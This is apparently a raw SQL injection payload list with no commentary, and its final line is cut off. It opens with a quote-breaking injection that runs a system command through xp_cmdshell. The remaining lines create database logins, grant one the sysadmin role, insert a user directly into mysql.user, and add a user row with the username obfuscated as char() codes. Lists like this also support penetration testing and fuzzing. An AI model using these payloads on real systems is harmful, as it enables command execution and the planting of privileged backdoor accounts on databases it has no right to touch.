'; exec master..xp_cmdshell 'ping 10.10.1.2'--
create user name identified by 'pass123'
create user name identified by pass123 temporary tablespace temp default tablespace users; 
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123'))
grant connect to name; grant resource to name;
insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
